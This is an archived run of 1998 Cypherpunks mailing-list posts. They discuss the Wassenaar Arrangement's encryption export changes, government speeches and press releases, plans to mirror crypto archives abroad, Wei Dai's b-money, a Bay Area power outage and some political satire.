To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Power Outage in San Fransisco/bay area (fwd)
Message-ID: <199812082359.RAA14768@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 8 Dec 1998 15:51:01 -0800 (PST)
> From: Max Inux <maxinux@bigfoot.com>
> Subject: Re: Power Outage in San Fransisco/bay area (fwd)

> On Tue, 8 Dec 1998, Jim Choate wrote:
> >Damn, you beat me to it. I was going to post something about a dry run for
> >Y2K in San Fran.
> >
> >Any rioting?
> 
> Suprisingly, no looting, major accideents (Only one was in the unaffected
> Fremont) by Mowry...  dont go towards NAI or Great America ;-)

Thanks for the feedback.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 9 Dec 1998 09:06:41 +0800
To: ichudov@Algebra.COM (Igor Chudov)
Subject: Re: I Got Mine
In-Reply-To: <4.0.2.19981208155702.0147d100@mail.well.com>
Message-ID: <199812082325.PAA28704@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



Well, if you're worried about worst-case scenarios (or variants on them)
it's as good as any and probably better than most. They've got everything
from gun tips to goat-raising.

I enjoyed it, FWIW. It doesn't make a pretense of saying what-if like a
bunch of the other books does: this says social unrest is damn near certain.

-Declan


At 03:13 PM 12-8-98 -0600, Igor Chudov @ home wrote:
>Declan McCullagh wrote:
>> 
>> At 12:07 PM 12-8-98 -0600, Igor Chudov @ home wrote:
>> >What I am looking for is a practical guide book on how to deal with
>> >cops and other law enforcement/jackbooted thug types, in the manner
>> >that minimizes my long term damage. Something along the lines of "You
>> >and the Police!", by Boston T. Party, a book that I greatly enjoyed.
>> 
>> BTW BTP has just come out with a Y2K book. It's a great read.
>
>Is it a useful book? BTP writings are always fun to read, but some of
>his recommendations seem suspect.
>
>	- Igor.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Dec 1998 10:59:24 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Altavista hacked
In-Reply-To: <199812082203.XAA25646@replay.com>
Message-ID: <v03130303b29390f0f0b7@[209.66.100.84]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:03 PM -0800 12/8/98, Anonymous wrote:
>It appears that www.altaviata.com has been hacked.
>
>Begin Quote:
>If you are looking for pornographic material (naked people)
>                             please Click Here
>

There is a typographic error in this URL.

The naked people pictures are at:

www.altaviagra.com



--Tim May

Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 9 Dec 1998 04:50:44 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The problem with 'Gilmore's RSAREF' site...
Message-ID: <199812081844.TAA05951@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Save that the cowards have never busted anyone for crypto exports.  It's
> dead letter law.  They know they'd lose a criminal case against a civilian.
> 
> DCF

What about the Martinez case?  She was convicted of exporting a
satellite TV descrambler because of its crypto hardware.

Charles Booher is still facing possible prosecution for putting his
SecureOffice program on his website.  His Grand Jury hearing for possible
indictment has been postponed, at last report.  Can we be sure that he
won't be indicted?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Garefelt <jang@pobox.se>
Date: Wed, 9 Dec 1998 14:34:07 +0800
To: cypherpunks@toad.com
Subject: News on Wassenaar anyone?
Message-ID: <366D79E5.8C3D052A@pobox.se>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have information on the new Wassenaar arrangement, or
information on when official information will be available?

I'm only interested in the crypto parts, and I have already read the
Aaron/Reuter story found on
http://www.crypto.com/reuters/show.cgi?article=912708583

Thanks

/Jan Garefelt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 9 Dec 1998 10:00:42 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Reinsch On Crypto/Wassenaar
Message-ID: <199812090127.UAA10345@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Excerpt from a speech by BXA's William Reinsch on December 7, 
1998, at the Practising Law Institute conference "Coping with U.S.
Export Controls." Note final paragraph about detailed crypto 
session today -- no report on that yet.

Full speech: http://jya.com/war120798-2.htm

Also by him yesterday on crypto: http://jya.com/war120798.htm

[Begin excerpt]

Encryption continues to be a hotly debated issue. As I stated last
year, the U.S. continues to support a balanced approach to encryption
policy which considers privacy and commercial interests as well as
protecting law enforcement and national security interests.
Furthermore, we also remain committed to promoting the growth of
global electronic commerce through secure financial and business
communications.

Our position has always been to seek industry-led, market-driven
solutions to achieve a balanced approach. What has changed is the
direction where technology and the market place are taking us. Key
recovery technology remains a very important part of our policy;
however, over the past two years, we have recognized that key recovery
is not a solution for all problems.

That recognition, brought about in part as a result of our ongoing
dialogue with industry, has helped us also focus on recoverable
technologies that can enable law enforcement to continue its
authorized activities.

As a result, on September 16, Vice President Gore unveiled a policy
update, which will not end the debate, but which does include steps to
further streamline exports of key recovery products and other
recoverable products which allow law enforcement, under proper legal
authority, recovery of plain text.

The update also provides for 1) the export of 56 bit DES worldwide to
any end user under a license exception; 2) exports of strong
encryption to U.S. companies and their subsidiaries under a license
exception; 3) exports of strong encryption to the insurance and
medical sectors in 45 countries under a license exception; and 4)
exports of strong encryption to secure on-line transactions between
on-line merchants and their customers in 45 countries under a license
exception. This is consistent with our earlier announcement relating
to financial institutions.

This is an evolutionary process and we intend to continue our
dialogue. We must continue to adapt to changes, and we will review 
our policies again within the year to determine whether further 
change is necessary. We intend to publish regulations implementing 
the Vice President's announcement this month.

With respect to developing a common international approach to
encryption policy, Ambassador David Aaron, our special envoy on
cryptography, is working with other countries to ensure that our
policies are compatible. He has found that most major producing
countries have public safety and national security concerns similar 
to ours and are interested in developing a harmonized international
approach regarding compatible infrastructures for electronic commerce
and for a key management infrastructure. At last week's Wassenaar
Arrangement plenary session, the participating states approved a
number of changes to modernize and improve multilateral encryption
export controls. These changes removed controls on products below 
56 bits and on certain consumer entertainment systems, such as DVD
products, and on cordless phone systems designed for home or office
use.

Most important, participating states agreed to extend controls to
mass-market encryption exports above 64 bits, thus closing a
significant loophole. This will enable governments to review the
dissemination of the strongest encryption products that otherwise
might fall into the hands of rogue end users.

For those of you deeply interested in the details of our encryption
policy, we have a specific session devoted to it tomorrow.

[End excerpt]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 9 Dec 1998 12:17:20 +0800
To: declan@well.com (Declan McCullagh)
Subject: Re: I Got Mine
In-Reply-To: <199812082325.PAA28704@smtp.well.com>
Message-ID: <199812090351.VAA18916@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Declan McCullagh wrote:
> 
> Well, if you're worried about worst-case scenarios (or variants on them)
> it's as good as any and probably better than most. They've got everything
> from gun tips to goat-raising.
> 
> I enjoyed it, FWIW. It doesn't make a pretense of saying what-if like a
> bunch of the other books does: this says social unrest is damn near certain.

Alright, Declan, what is the title of the book, and better yet the
ISBN? Thank you.

igor

> -Declan
> 
> 
> At 03:13 PM 12-8-98 -0600, Igor Chudov @ home wrote:
> >Declan McCullagh wrote:
> >> 
> >> At 12:07 PM 12-8-98 -0600, Igor Chudov @ home wrote:
> >> >What I am looking for is a practical guide book on how to deal with
> >> >cops and other law enforcement/jackbooted thug types, in the manner
> >> >that minimizes my long term damage. Something along the lines of "You
> >> >and the Police!", by Boston T. Party, a book that I greatly enjoyed.
> >> 
> >> BTW BTP has just come out with a Y2K book. It's a great read.
> >
> >Is it a useful book? BTP writings are always fun to read, but some of
> >his recommendations seem suspect.
> >
> >	- Igor.
> > 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 9 Dec 1998 12:29:06 +0800
To: John Young <cypherpunks@EINSTEIN.ssz.com
Subject: Re: Reinsch On Crypto/Wassenaar
In-Reply-To: <199812090127.UAA10345@camel8.mindspring.com>
Message-ID: <199812090359.TAA06433@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



Note I have an article up at wired.com about Reinsch's speech yesterday on
crypto at a defense/critical inf event.

-Declan

At 08:16 PM 12-8-98 -0500, John Young wrote:
>Excerpt from a speech by BXA's William Reinsch on December 7, 
>1998, at the Practising Law Institute conference "Coping with U.S.
>Export Controls." Note final paragraph about detailed crypto 
>session today -- no report on that yet.
>
>Full speech: http://jya.com/war120798-2.htm
>
>Also by him yesterday on crypto: http://jya.com/war120798.htm
>
>[Begin excerpt]
>
>Encryption continues to be a hotly debated issue. As I stated last
>year, the U.S. continues to support a balanced approach to encryption
>policy which considers privacy and commercial interests as well as
>protecting law enforcement and national security interests.
>Furthermore, we also remain committed to promoting the growth of
>global electronic commerce through secure financial and business
>communications.
>
>Our position has always been to seek industry-led, market-driven
>solutions to achieve a balanced approach. What has changed is the
>direction where technology and the market place are taking us. Key
>recovery technology remains a very important part of our policy;
>however, over the past two years, we have recognized that key recovery
>is not a solution for all problems.
>
>That recognition, brought about in part as a result of our ongoing
>dialogue with industry, has helped us also focus on recoverable
>technologies that can enable law enforcement to continue its
>authorized activities.
>
>As a result, on September 16, Vice President Gore unveiled a policy
>update, which will not end the debate, but which does include steps to
>further streamline exports of key recovery products and other
>recoverable products which allow law enforcement, under proper legal
>authority, recovery of plain text.
>
>The update also provides for 1) the export of 56 bit DES worldwide to
>any end user under a license exception; 2) exports of strong
>encryption to U.S. companies and their subsidiaries under a license
>exception; 3) exports of strong encryption to the insurance and
>medical sectors in 45 countries under a license exception; and 4)
>exports of strong encryption to secure on-line transactions between
>on-line merchants and their customers in 45 countries under a license
>exception. This is consistent with our earlier announcement relating
>to financial institutions.
>
>This is an evolutionary process and we intend to continue our
>dialogue. We must continue to adapt to changes, and we will review 
>our policies again within the year to determine whether further 
>change is necessary. We intend to publish regulations implementing 
>the Vice President's announcement this month.
>
>With respect to developing a common international approach to
>encryption policy, Ambassador David Aaron, our special envoy on
>cryptography, is working with other countries to ensure that our
>policies are compatible. He has found that most major producing
>countries have public safety and national security concerns similar 
>to ours and are interested in developing a harmonized international
>approach regarding compatible infrastructures for electronic commerce
>and for a key management infrastructure. At last week's Wassenaar
>Arrangement plenary session, the participating states approved a
>number of changes to modernize and improve multilateral encryption
>export controls. These changes removed controls on products below 
>56 bits and on certain consumer entertainment systems, such as DVD
>products, and on cordless phone systems designed for home or office
>use.
>
>Most important, participating states agreed to extend controls to
>mass-market encryption exports above 64 bits, thus closing a
>significant loophole. This will enable governments to review the
>dissemination of the strongest encryption products that otherwise
>might fall into the hands of rogue end users.
>
>For those of you deeply interested in the details of our encryption
>policy, we have a specific session devoted to it tomorrow.
>
>[End excerpt]
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 9 Dec 1998 07:02:34 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Altavista hacked
Message-ID: <199812082203.XAA25646@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




It appears that www.altaviata.com has been hacked.

Begin Quote:
If you are looking for pornographic material (naked people)
                             please Click Here 

         Else please check back with us soon, we are under
                                construction. 

Thanks. 

End Quote

Resolving *.digital.com DNS entries seems impossible. Any ideas? Wish
DNSsec was deployed, it might of prevented this.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 9 Dec 1998 16:39:33 +0800
To: cypherpunks@cyberpass.net
Subject: Web Hosting Providers in Many Countries?  For crypto archives.
Message-ID: <3.0.5.32.19981208231218.008f15f0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



John Gilmore has proposed setting up crypto archives in
many countries to avoid Wassenaar restriction problems.
Does anybody have a good source for information on web hosting providers
or other ISPs in a variety of countries around the world?
Shell accounts are nicer, because it's easier to create
servers that check where the request is coming from,
for countries that insist you only provide access to their citizens
but still allow you to do that on a web site.  The US doesn't
appear to have strictly defined legal requirements for such sites (YET)
and places like MIT have gotten quite flexible about it.

Also, are there any good sources of relatively private VISA
credit cards, preferably outside the US, that can be used
to rent computer accounts with?

There are other crypto distribution methods that, while slower,
are still legal from the US - censoring printed books embarasses
them a bit still, though some other countries don't have
the same squeamishness even though they may be less interested
in banning the material.  Printing PGP source books was annoying,
but a week's delay in shipping few-page crypto subroutines
isn't that serious, especially if it's in a scanner-friendly format.

Any guess how the various countries feel about faxes of source code?

And, of course, shipping or even selling source for 40-bit RC4
and 512-bit RSA is pretty simple, even if you don't include the note
"WARNING: DO NOT CHANGE THE #define KEYLENGTH TO 128 OR THE
#define MODULUSLENGTH TO 2048 AND RECOMPILE"
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 9 Dec 1998 16:20:43 +0800
To: "David G. Koontz" <gnu@toad.com>
Subject: Chocolate Rations, Strange-Looking Seed Pods, and quid for "The Wassenaar Arrangement"
In-Reply-To: <199812050240.SAA24692@toad.com>
Message-ID: <3.0.5.32.19981208234027.008b5100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:28 PM 12/7/98 -0800, David G. Koontz wrote:
>John Gilmore wrote:
>>> PS:  I particularly like Ambassador Aaron's characterization that
>> this new development will help US industry, by censoring foreign crypto
>> publishers in the same way the US government censors US publishers.
>> A giant step forward for freedom and commerce everywhere, eh Mr. Aaron?
>> What an incredibly talented liar, I mean diplomat, he is.
>
>A glorious anouncement!  The chocolate ration has been raised to 20
>grams today, from 24 grams!
>
>(for those of you who thought it would never get here)


"The Wassenaar Arrangement" really does sound like 
the title for a bad Robert Ludlum novel.....
But the posting about the Blair Administration taking their
anti-key-escrow positions off their official web sites
does sound like the History Department's been at it again.

I've been going through yet another round of airline security people
imposing some new requirement and claiming it's "always been that way" or
"been that way for a long time, ever since I started working here."
The latest round is wearing hats through the X-Ray machine - 
they insist you take your hat off, even if you didn't beep,
and that it's an "FAA requirement".  
San Jose started doing this about a year ago, but this is the first time 
San Francisco has done so, even though they claim otherwise
(though I probably haven't worn a hat there since last rainy season.)

Most people who wear hats at San Jose airport are Mexicans in
cowboy hats, who probably don't care all that much; I'd expect that
the first guard at LaGuardia or Kennedy who tries to insist
that the Lubavitchers take their hats off in submission to the government
will find themselves surrounded by annoyed bearded men talking
about religious discrimination lawsuits....

Personally, I wear a hat because it keeps my head from getting cold,
now that I no longer have as much OEM insulation on it as I used to,
and while I don't have any religious rules requiring me to wear a hat,
I _am_ a Quaker, and we have a history of getting uppity about
governments insisting that everybody take their hats off in 
submission to government officials, or address them as "Your Highness",
or other things that suggest one child of God is worth less than another.




				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Dec 1998 14:26:30 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: German government press release on Wassenaar (fwd)
Message-ID: <199812090546.XAA16714@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: German government press release on Wassenaar
> Date: Wed, 9 Dec 1998 06:04:18 +0100 (+0100)
> From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)

> authentication as well as certain product groups such as wireless
> phones and pay TV devices are completely exempted from export
> control. The regulation concerning freely available products (public
> domain) has remained unchanged.

Is there any mention of wireless networking devices?


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 9 Dec 1998 13:49:43 +0800
To: Alan Olsen <alan@clueserver.org>
Subject: Re: spy cameras
In-Reply-To: <Pine.LNX.3.96.981209101158.9137A-100000@clueserver.org>
Message-ID: <Pine.BSF.3.91.981209002138.22925C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




But could it recognise an impeachable offense?

That would have saved us a lot of time, money, and confusion. I'm not 
even sure what *sex* is anymore.

On Wed, 9 Dec 1998, Alan Olsen wrote:
> On Tue, 8 Dec 1998, Vladimir Z. Nuri wrote:
> > POLICE scientists are close to a major breakthrough that will allow CCTV
> > cameras to "recognise" criminal activity.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 9 Dec 1998 13:49:12 +0800
To: b!X <bix@geekforce.org>
Subject: Re: Altavista hacked
In-Reply-To: <Pine.LNX.3.93.981208172057.12163A-100000@millennium-cafe.com>
Message-ID: <Pine.BSF.3.91.981209002720.22925D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Try "altaviagra." Probably confuses the colors green and blue on your 
browser, and turns your floppy disk into a hard drive.

Since when did AOLers learn to use anonymous remailers?

> On Tue, 8 Dec 1998, Anonymous wrote:
> 
> # It appears that www.altaviata.com has been hacked.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 9 Dec 1998 09:45:43 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Wei Dei's "b-money" protocol
Message-ID: <199812090113.CAA09872@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



x@x.com asks about Wei Dei's b-money proposal:
>there must be something here that I'm missing.  At the core of this
>protocol seems to be the establishment not of crypto anarchy but of a
>crypto elite. in this scheme only the processors of computing power  have
>economic power.  Now I realize that our current economic system is based on
>economic power being invested in a closed community of powerful elites, and
>is by no means egalitarian, but this looks to be like simply substituting
>one group of "haves" for a different group of "haves"
>
>I have to admit not being familiar with the Orthodoxy of crypto anarchy,
>but if the premise is a centerless self organizing system of free agents
>this protocol seems to miss the mark. or what is it that I am missing here?

The description is intended to show how money is transferred, and how it
is created.  These are technically difficult issues when dealing with
electronic money, and that is what the proposal addresses.

It is not anticipated that most people will make money by using their
computing power.  That feature is only used when the money supply needs
to expand, because of increased economic activity.

Instead, people will generally get money the same way they do today:
someone will give it to them, either as a gift or as payment.  You are
free to give your money to whomever you want to, and you are free to
offer your goods and services in exchange for money.  Such exchanges
of money should be much greater in volume than the amount of new money
which is created by burning computer cycles.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Wed, 9 Dec 1998 12:46:08 +0800
To: cypherpunks@Algebra.COM
Subject: Survey Says Citizens Feel 'Threatened' By Government
Message-ID: <b944ab81b88e8af3cc4865f7fbab25b3@anonymous>
MIME-Version: 1.0
Content-Type: text/plain




   A survey has suggested that up to half a million American 
   citizens may have been upset by something they have heard
   about the government.
   
   The USG poll shows that one in five of nearly 4,000 citizens 
   between the ages of six and 16 interviewed for the survey between
   September and October this year were "uncomfortable" with some
   content heard about the government.
   
   In the US, 60 million citizens are estimated to know who Clinton
   actually is - roughly a third of all citizens between 18 and 60.
   
   Of those who have had negative experiences with the government,
   the largest proportion - 40% - has seen something "unconstitutional."
   
   'Not surprised'
   
   One in seven said they had encountered unconstitutional actions
   that "freightened them", while 25% saw actions that they thought
   "would get them into jail."
   
   USG Associate Shill Rob Lawson described the numbers as a 
   "significant minority".
   
   The citizen's charity DNC Welfare for Deadbeats suggested the survey
   strengthened calls for government regulation to protect the eyes of
   citizens.
   
   Libertarian spokesman John Carr said: "I regret to say I'm not surprised 
   by this survey's findings, it's what we have been saying for some time."
   
   Government nannies
   
   "Big Brothers need to know their citizens are looking for pro-USG
   information in safety and security. At the moment, they have no way of 
   knowing that at all."

   DNC Welfare for Deadbeats, which steals from the citizens to give to 
   those who are multiplying like rabbits with no means to provide for 
   their offspring, and advises the government to spend more money and to
   legislate special privlidges for some citizens who are "disadvantaged,"
   backs the introduction of "Big Brothers" - laws which filter out content
   unsuitable for citizens.
   
   The survey, called TLA.net, was paid for by Microsoft, the NOW, NAI and
   KRAP in syndicate. 
   
   The Ministry of Truth and Propoganda's forthcoming review on Internet
   regulation is expected to be published before Christmas.

[from news.propoganda.us]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Wed, 9 Dec 1998 13:56:44 +0800
To: cryptography@c2.net
Subject: German government press release on Wassenaar
Message-ID: <m0znbnP-0003bAC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



Press release from the Ministry of Economy
http://www.bmwi.de/presse/1998/1208prm2.html, my translation:

       Export control for encryption technology loosened

       No "key recovery" for cryptographic products

At their plenary meeting on December 2nd and 3rd 1998 the 33 treaty
states of the Wassenaar Arrangement have decided to revise the export
control for encryption technologies (cryptographic products). Export
control has been loosened, and the embodiment of crypto restrictions
has been hindered. Thus there will be no export ban for encryption
products in the future.

The previously comprehensive control characterized by a large number
of sectoral exceptions has been replaced by a positively formulated
list text. In future all kinds of products - hardware and software are
treated in the same way - are only subject to export control starting
at a key length of 56 bits. Mass market products that fulfill certain
requirements are subject to export control only up from a key length
of 64 bits. For the present the restriction to 64 bits is valid for
two years, it must then be renewed unanimously or it will be
cancelled. In addition, methods such as digital signatures and
authentication as well as certain product groups such as wireless
phones and pay TV devices are completely exempted from export
control. The regulation concerning freely available products (public
domain) has remained unchanged.

Certain states that had initially demanded special treatment for "key
recovery" products have not have been unsuccessful. Thus the export of
encryption technology will remain possible without depositing keys
with government agencies.

----------------------------------------------------------------------
>From an AP news report, my translation [The Green Party is part of the
new German government, but the Ministry of Economy is led by the
Social Democrats]:

Green Party member of parliament Hans-Christian Strbele critisized
that the government gave in to US pressure for stronger control on
encryption. The agreement would affect the obvious need of computer
users to protect their business and private communication from
unauthorized access. Also the business opportunities of German
producers of powerful encryption software would be reduced in a
serious way. Thus when implementing the agreement in national law,
negative effects must be limited as much as possible.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FitugMix <tonne@thur.de>
Date: Wed, 9 Dec 1998 13:51:24 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Power Outage in San Fransisco/bay area
Message-ID: <199812090531.GAA12050@jengate.thur.de>
MIME-Version: 1.0
Content-Type: text/plain



Sounds to me like a practice-run for Y2K.

Max Inux wrote:
> 
> Well, we are going on hour 4 now, most of the power is back.  One group of
> 2-4 employees caused it they say.  This was admitted 3 hours later, and
> then they knew 15 minutes after it happens.. typical.  They expect to be
> back on by this afternoon
> 
> On the Shell Building at 8:30AM
> 
> "Building closed, no power.  Power will not be restored for 6-8 hours."
> 
> I wonder how they knew.  The estimate is probably about right too, wierd.
> 
> The mission village sub-station has been re-oppened, and most peoples
> power is now being revived.  Funny how 2-4 people not following procedure
> were able to shut down 4 substations.  Looks like PG&E have lots of work
> ahead to find out the cause/effect of this type action.
> 
> Max
> --   Max Inux <maxinux@openpgp.net>  New DH and RSA keys Generated.
>                Kinky Sex makes the world go round
>        If crypto is outlawed only outlaws will have crypto




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Wed, 9 Dec 1998 16:14:52 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Building crypto archives worldwide to foil US-built Ber
Message-ID: <19981209071620.20649.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



I think Arnold Reinhold has the right idea, 100% - only post 
plain-English versions of algorithms. To paraphrase: "Banning 
plain-English instructions for building your own crypto
software will require the starkest abridgement of the First
Amendment."

Force their hand. Make them spell it out in the harshest
black and white. It is the only way to get the clueless 
sheeple to figure out what it really going on.

Jim Choate is also right. Empower _everyone_ to write their
own code, regardless of mathematical skill. Spell it out so
simply that people with access to only BASIC can do it in
their living room while watching TV. Yeah, so we appeal to
"the lowest common denomiator." Face it, that's 95% of the
population, and we have to get them on our side.


Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Tue, 08 Dec 1998 10:41:33 -0500
> > From: John Young <jya@pipeline.com>
> > Subject: Re: Building crypto archives worldwide to foil US-built Ber
> 
> > Yes, Gilmore's proposal was to mirror the contents; URLs threaten
> > no reg-makers.
> >
> > Yep, mirrors of everything would be very large. We've heard already
> > that folks would like help in knowing what to mirror if they can't do
> > large archives, or can't easily decide which are most important.
> 
> [text deleted]
> 
> > What would help is a list from experts on what are the most gov-enraging
> > programs. We'd like to offer a few of those on jya.com, to test BXA's up-and-
> > running crypto-enforcement program, maybe get some jail and trial pleasure,
> > it's been too quiet on Bernstein, Junger, Karn, et al, a deliberate gov-stall,
> > awaiting Wassenaar.
> 
> Besides enraging, it should also include the necessary documents,
> monographs, libraries, etc. to empower others to write the code within their
> own legal boundaries.
> 
> If somebody makes the effort to compile such a list I'd like to personaly
> request they include this in addition to finished product.
> 
>     ____________________________________________________________________
> 
>            If I can put in one word what has always infuriated me
>            in any person, any group, any movement, or any nation,
>            it is: bullying
>                                                 Howard Zinn
> 
>        The Armadillo Group       ,::////;::-.          James Choate
>        Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
>        www.ssz.com            .',  ||||    `/( e\      512-451-7087
>                            -====~~mm-'`-```-mm --'-
>     --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Dec 1998 21:54:57 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
Message-ID: <199812091324.HAA18021@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 09 Dec 1998 13:59:20 +0100
> From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
> Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)

> I don't see why you have to pose such severe selection criteria.

Because those are the issues that will determine success.

> As long as a number of countries don't yet have export regulations,

Which doesn't mean they won't hassle the operators with various techniques
in order to pursuade them it's a bad idea to continue.

> If the 'economies', 'infrastructure' 'religon' and what not of the 
> countries do not (yet) affect crypto laws, why care about them? If 

They effect crypto by defintion.

> at a later point of time some of these countries do have crypto laws, 

If they don't have crypto laws it's likely they don't have a lot of other
sorts of laws and the social and economic structure those laws imply. This
makes it very difficult to operate a archive with any sort of stability or
protection.

> well, simply close down the archive there and let the sites in the 

And what about the costs and effects incurred by that person you so glibly
throw away?

> Much more important is to discuss how to solve the finacial problem

There is NO financial problem. It costs hundreds of dollars to purchase the
hardware. The connectivity is less than $100 a month in most parts of the
world. It simply isn't expensive or economicaly challenging.

That ISN'T the problem and should recieve scant attention while these other
issues are extant.

Bottem line, if you can't afford to put up a box then you're not going to be
able to afford to deal with the other issues such activities incur mainly
because you're going to be too busy trying to pay your housing and food
costs. In that situation you've better things to do with your time then run
an archive site.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 9 Dec 1998 21:34:46 +0800
To: cryptography@c2.net
Subject: Re: German government press release on Wassenaar
In-Reply-To: <m0znbnP-0003bAC@ulf.mali.sub.org>
Message-ID: <v04020a1bb2941c8e1795@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:04 AM -0500 on 12/9/98, Ulf Mller wrote:


> Press release from the Ministry of Economy
> http://www.bmwi.de/presse/1998/1208prm2.html, my translation:
>
>        Export control for encryption technology loosened

War is Peace, Freedom is Slavery?

:-).
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
